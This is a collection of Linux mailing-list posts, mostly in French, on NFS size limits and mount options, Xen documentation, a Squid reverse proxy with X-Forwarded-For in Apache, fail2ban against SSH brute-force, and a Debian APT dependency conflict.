Nicolas KOWALSKI a écrit : 2008/12/9 Romaric DEFAUX [EMAIL PROTECTED]: Bonjour a tous ! Bonjour, J'ai essayé plein d'options de montage différentes, les meilleurs perf. obtenues jusqu'à présent sont avec les options suivantes : -o sync,rw,hard,intr,rsize=32768,wsize=32768 Tu es donc en udp. Utiliser tcp améliore-t-il les choses ? Je ne peux pas tester ce soir, j'essaierai demain matin et je te dirais ce qu'il en est (il suffit juste d'ajouter l'option 'tcp' n'est-ce pas ?) Vous avez une idée sur la source du problème ? Quelles sont les options d'export sur le serveur (/etc/exports) ? Quel est le type de système de fichiers sous-jacent sur le serveur (ext3/xfs/...) ? Voici mon exports : /baiea 172.16.20.2(rw,sync,no_root_squash,no_subtree_check) Et le système de fichier c'est de l'ext3 non journalisé. Mais si c'était le système de fichier en cause ça ne changerai rien de passer ou pas par NFS non ? Merci de ton aide :) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Recherche infos sur Xen
SELS INGENIERIE a écrit : Bonjour, Pour la configuration reseau sous XEN tu dois utiliser le paquet bridge-utils. Cela permet de modifier le comportement de ta carte reseau pour qu'elle fonctionne soit en bridge soit en NAT pour chacun de tes DOM U. C'est ce lien qui l'explique http://howto.landure.fr/gnu-linux/debian-4-0-etch/installer-et-configurer-xen-sur-debian-4-0-etch JC Pascal Le Bris a écrit : Bonjour Remy Pierre-Etienne a écrit : Bonjour. Je cherche des informations sur Xen et comment l'utiliser avec Debian. Il me semble (malheureusement) que les sites : http://xenfr.org/tiki-index.php et http://www.cl.cam.ac.uk/research/srg/netos/xen/ ne soit plus à jour depuis plusieurs années. J'ai lu sur Wikipédia que XenSource a été acquis par Citrix en 2007. Cela signifie-t-il que Xen ne soit plus libre ??? ? bonne question +1 Où trouver de la doc/tuto/aide (française mais je peux faire un effort pour l'anglais) à jour pour Xen ??? Je ne voudrais pas parler à la place d'un des contributeurs actif de cette liste, mais j'ai commencé par : http://www.bortzmeyer.org/xen.html Quel est la version de Xen actuellement ?? Je m'essaye sous etch avec : ii libc6-xen 2.3.6.ds1-13etch7GNU C Library: Shared libraries [Xen version ii linux-image-2.6-xen-686 2.6.18+6etch3Linux kernel 2.6 image on i686 ii linux-image-2.6.18-6-xen-686 2.6.18.dfsg.1-22etch3Linux 2.6.18 image on i686 ii linux-modules-2.6.18-6-xen-6862.6.18.dfsg.1-22etch3Linux 2.6.18 modules on i686 ii xen-hypervisor-3.0.3-1-i386-pae 3.0.3-0-4The Xen Hypervisor on i386 with pae ii xen-ioemu-3.0.3-1 3.0.3-0-4XEN administrative tools ii xen-linux-system-2.6.18-6-xen-686 2.6.18.dfsg.1-22etch3XEN system with Linux 2.6.18 image on i686 ii xen-tools 3.9-4Tools to manage Debian XEN virtual servers ii xen-utils-3.0.3-1 3.0.3-0-4XEN administrative tools ii xen-utils-common 3.0.3-0-2XEN administrative tools - common files Je me suis heurté à la config réseau sur la création des /dev/loop/? au lieu de /de/loop?. Pour le reste ca me semble OK Libre merci a tous. Pascal Il y a toujours une version libre qui existe. Elle est plus buggué que la version citrix mais quand même utilisable (on l'utilise en prod chez nous) J'ai écrit quelques tutos rapides, tu peux aussi y jeter un coup d'oeil : http://ladmin-linux.blogspot.com/search/label/xen Il y a 4 parties pour l'instant, et c'est en français :) Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [NFS] Limitation de taille ?
Romaric DEFAUX a écrit : Frédéric Massot a écrit : Romaric DEFAUX a écrit : Bonjour à tous, J'ai un problème de limitation de taille sur un montage NFS : sur le serveur 1, j'ai une baie de disque de 5,4T : df -h FilesystemSize Used Avail Use% Mounted on ... /dev/sdb1 5,4T 108G 5,0T 3% /baiea J'ai monté en NFS /baiea sur serveur 2, mais j'ai l'impression de ne pas pouvoir utiliser tout son espace : df -h FilesystemSize Used Avail Use% Mounted on ... 172.16.20.1:/baiea1.4T 101G 1022G 9% /baiea Cela viendrait-il des versions utilisées ? D'une option noyau ? serveur1 est une ubuntu ii nfs-common 1:1.1.1~git-20070709-3ubuntu1 NFS support files common to client and serve ii nfs-user-server 2.2beta47-23 User space NFS server serveur2 est une gentoo net-fs/nfs-utils-1.1.3 Il faut peut être vérifier les options des noyaux des deux serveurs : CONFIG_LBD: Enable block devices of size 2TB and larger. CONFIG_LSF: Say Y here if you want to be able to handle very large files (2TB and larger) J'ai vérifié dans la conf du kernel de la gentoo et effectivement ces deux options sont désactivées. Je les active et, le temps de recompiler et rebooter, je vous dis si c'est ça le problème. Ca y est enfin ! J'ai activé CONFIG_LBD, CONFIG_LSF et aussi CONFIG_EFI et CONFIG_EFI_PARTITION pour gérer les partitions gpt. Mais ça ne marchais toujours pas... Alors j'ai changé de server nfs, j'ai mis nfs-kernel-server à la place de nfs-user-server (j'avais mis celui là au feeling sans vraiment me renseigner sur les différences ^^!) Maintenant c'est OK ! Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [NFS] Limitation de taille ?
Frédéric Massot a écrit : Romaric DEFAUX a écrit : Bonjour à tous, J'ai un problème de limitation de taille sur un montage NFS : sur le serveur 1, j'ai une baie de disque de 5,4T : df -h FilesystemSize Used Avail Use% Mounted on ... /dev/sdb1 5,4T 108G 5,0T 3% /baiea J'ai monté en NFS /baiea sur serveur 2, mais j'ai l'impression de ne pas pouvoir utiliser tout son espace : df -h FilesystemSize Used Avail Use% Mounted on ... 172.16.20.1:/baiea1.4T 101G 1022G 9% /baiea Cela viendrait-il des versions utilisées ? D'une option noyau ? serveur1 est une ubuntu ii nfs-common 1:1.1.1~git-20070709-3ubuntu1 NFS support files common to client and serve ii nfs-user-server 2.2beta47-23 User space NFS server serveur2 est une gentoo net-fs/nfs-utils-1.1.3 Il faut peut être vérifier les options des noyaux des deux serveurs : CONFIG_LBD: Enable block devices of size 2TB and larger. CONFIG_LSF: Say Y here if you want to be able to handle very large files (2TB and larger) J'ai vérifié dans la conf du kernel de la gentoo et effectivement ces deux options sont désactivées. Je les active et, le temps de recompiler et rebooter, je vous dis si c'est ça le problème. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
[NFS] Limitation de taille ?
Bonjour à tous, J'ai un problème de limitation de taille sur un montage NFS : sur le serveur 1, j'ai une baie de disque de 5,4T : df -h FilesystemSize Used Avail Use% Mounted on ... /dev/sdb1 5,4T 108G 5,0T 3% /baiea J'ai monté en NFS /baiea sur serveur 2, mais j'ai l'impression de ne pas pouvoir utiliser tout son espace : df -h FilesystemSize Used Avail Use% Mounted on ... 172.16.20.1:/baiea1.4T 101G 1022G 9% /baiea Cela viendrait-il des versions utilisées ? D'une option noyau ? serveur1 est une ubuntu ii nfs-common1:1.1.1~git-20070709-3ubuntu1 NFS support files common to client and serve ii nfs-user-server 2.2beta47-23 User space NFS server serveur2 est une gentoo net-fs/nfs-utils-1.1.3 Si vous avez besoin d'autres infos dites moi lesquelles. D'avance merci ! Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [NFS] Limitation de taille ?
Kevin Hinault a écrit : Le 1 décembre 2008 11:49, Daniel Caillibaud [EMAIL PROTECTED] a écrit : Romaric DEFAUX a écrit : J'ai un problème de limitation de taille sur un montage NFS : sur le serveur 1, j'ai une baie de disque de 5,4T : 172.16.20.1:/baiea1.4T 101G 1022G 9% /baiea Normal je pense, la différence entre tes 1,4To et tes 1123Go doit correspondre aux 5% habituellement réservés à root (par défaut en ext3, ça se paramètre à la création du filesystem, ça peut probablement se modifier avec tune2fs). Je crois qu'il parlait plutôt de la différence entre sa baie qui fait 5.4 To et de son montage NFS qui fait 1.4 To ;) Oui en effet je parle de cette différence de 4To :) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SQUID] Ip source réelle
Pascal Hambourg a écrit :
Salut,
[EMAIL PROTECTED] a écrit :
j'ai un serveur web apache sur une machine
j'ai un squid sur la même machine, utilisé en reverse proxy
transparent pour faire du cache et accélérer + alléger mon serveur web
Voici donc en gros le chemin d'une requête venant d'internet :
INTERNET --- SQUID --- APACHE --- SQUID --- INTERNET
ou
INTERNET --- SQUID --- INTERNET (si la page est dans le cache)
Le problème est que du coup Apache voit toutes les requêtes provenant
de l'IP locale (192.168.X.X), et non pas l'IP source de la requête !
Est-ce que quelqu'un saurait si c'est possible de faire en sorte
qu'apache voit l'ip source réelle ?
Tu peux utiliser l'en-tête HTTP X-Forwarded-For qui est ajoutée par
squid.
Premièrement merci de ta réponse rapide :)
C'est donc un paramètre à changer au niveau d'apache ? Tu saurais me
mettre sur une piste ?
Et pour éclairer un peu plus mon problème, c'est que je veux appliquer
certaines règles de réécritures au niveau du vhost selon l'IP source.
Pour l'instant j'utilise un truc du genre :
RewriteCond %{REMOTE_HOST} !192.168.X.X
C'est peut-être là que je ne devrais pas utiliser REMOTE_HOST mais autre
chose...
Pareil au niveau des logs d'apache, j'utilise les customLog combined,
faut peut-être que je modifie ça...
Bon je cherche et si je trouve la solution je l'envoie sur la mailing.
En attendant, si tu sais comment faire n'hésite pas à me le dire ;) !
D'avance merci !
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/DebFrFrenchLists
Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et
Reply-To:
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SQUID] Ip source réelle
Romaric DEFAUX a écrit :
Pascal Hambourg a écrit :
Salut,
[EMAIL PROTECTED] a écrit :
j'ai un serveur web apache sur une machine
j'ai un squid sur la même machine, utilisé en reverse proxy
transparent pour faire du cache et accélérer + alléger mon serveur web
Voici donc en gros le chemin d'une requête venant d'internet :
INTERNET --- SQUID --- APACHE --- SQUID --- INTERNET
ou
INTERNET --- SQUID --- INTERNET (si la page est dans le cache)
Le problème est que du coup Apache voit toutes les requêtes
provenant de l'IP locale (192.168.X.X), et non pas l'IP source de la
requête !
Est-ce que quelqu'un saurait si c'est possible de faire en sorte
qu'apache voit l'ip source réelle ?
Tu peux utiliser l'en-tête HTTP X-Forwarded-For qui est ajoutée par
squid.
Premièrement merci de ta réponse rapide :)
C'est donc un paramètre à changer au niveau d'apache ? Tu saurais me
mettre sur une piste ?
Et pour éclairer un peu plus mon problème, c'est que je veux appliquer
certaines règles de réécritures au niveau du vhost selon l'IP source.
Pour l'instant j'utilise un truc du genre :
RewriteCond %{REMOTE_HOST} !192.168.X.X
C'est peut-être là que je ne devrais pas utiliser REMOTE_HOST mais
autre chose...
Pareil au niveau des logs d'apache, j'utilise les customLog
combined, faut peut-être que je modifie ça...
Bon je cherche et si je trouve la solution je l'envoie sur la mailing.
En attendant, si tu sais comment faire n'hésite pas à me le dire ;) !
D'avance merci !
J'ai trouvé !
Squid ajoute un en-tête de la forme X-Forwarded-For 127.0.0.1, W.X.Y.Z
où W.X.Y.Z est l'IP d'origine (c'est lié à ma conf de SQUID je suppose,
en transparent avec une règle de nat dans iptable, d'où le 127.0.0.1).
Si l'IP source est locale, (j'ai testé en faisant un lynx), l'en-tête
X-Forwarded-For est vide.
Du coup j'ajoute la condition suivante avant mes règles :
RewriteCond %{HTTP:X-Forwarded-For} .*,.*
pour qu'elles ne s'appliquent que lorsque l'IP source réelle est externe.
Youpi !!!
Romaric
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/DebFrFrenchLists
Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et
Reply-To:
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Pare-feu : ouverture de ports à reception d'un mail
Bonjour, Je ne réponds pas directement à ta question, mais il existe des outils pour contrer le brute-force (Si c'est bien d'attaques de brute-force dont tu parles). Perso, j'utilise fail2ban, ce qui permet de bloquer les attaques de brute-force sur pas mal de services (SSH, SMTP, IMAP, POP, ...) Romaric Patrice OLIVER a écrit : Bonjour, Utilisant Denyhost depuis décembre, j'observe que ces temps-ci les attaques SSH vont bon train. Pour info, le pare-feu de mon entreprise a été attaqué 302 fois cette nuit ... Je souhaite donc fermer le port SSH, et l'ouvrir quand mon relais de messagerie reçoit un mail. Avez-vous déjà mis cela en oeuvre ? Merci. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
[APT] Strange dependency problem
Hi all ! I hope I'm writing to the good mailing-list :) My problem is I can't install libapache2-mod-security because of unmet dependencies... Here I try to install libapache2-mod-security : # apt-get install libapache2-mod-security The following packages have unmet dependencies: libapache2-mod-security: Depends: apache2-common but it is not going to be installed E: Broken packages So I check my apache package installed : # dpkg -l | grep -i 'apache' ii apache-common 1.3.34-4.1+etc support files for all Apache webservers ii apache2 2.2.3-4+etch4 Next generation, scalable, extendable web se *rc apache2-common 2.0.54-5sarge1 next generation, scalable, extendable web se* ii apache2-mpm-pr 2.2.3-4+etch4 Traditional model for Apache HTTPD 2.1 ii apache2-prefor 2.2.3-4+etch4 development headers for apache2 ii apache2-utils 2.2.3-4+etch4 utility programs for webservers ii apache2.2-comm 2.2.3-4+etch4 Next generation, scalable, extendable web se ii apachetop 0.12.5-1sarge1 Realtime Apache monitoring tool ii libapache-mod- 4.4.4-8+etch4 server-side, HTML-embedded scripting languag rc libapache-mod- 1.8.7-1 Tighten web applications security for Apache ii libapache2-mod 4.4.4-8+etch4 server-side, HTML-embedded scripting languag ii libapr0 2.0.54-5sarge1 the Apache Portable Runtime ii libapr1 1.2.7-8.2 The Apache Portable Runtime Library ii libapr1-dev 1.2.7-8.2 The Apache Portable Runtime Library - Develo ii libaprutil1 1.2.7+dfsg-2 The Apache Portable Runtime Utility Library ii libaprutil1-de 1.2.7+dfsg-2 The Apache Portable Runtime Utility Library apache2-common is here but in sarge. After checking my repository, I want to install it in etch : # apt-get install apache2-common And here I got the strange error : The following packages have unmet dependencies: apache2-common: Depends: apache2-utils (= 2.0.54-5sarge2) but 2.2.3-4+etch4 is to be installed E: Broken packages I said strange because the package apache2-utils is in the good version (etch) !!! *ii apache2-utils 2.2.3-4+etch4 utility programs for webservers* As anyone an idea ? Oh, and I try with aptitude too, but changed nothing... Thanks you Regards -- *Romaric DEFAUX* Administrateur Systèmes et Réseaux Tel: +33 (0) 820 00 70 70 Fax: +33 (0)3 20 63 88 89 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] www.audaxis.com http://www.audaxis.com -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
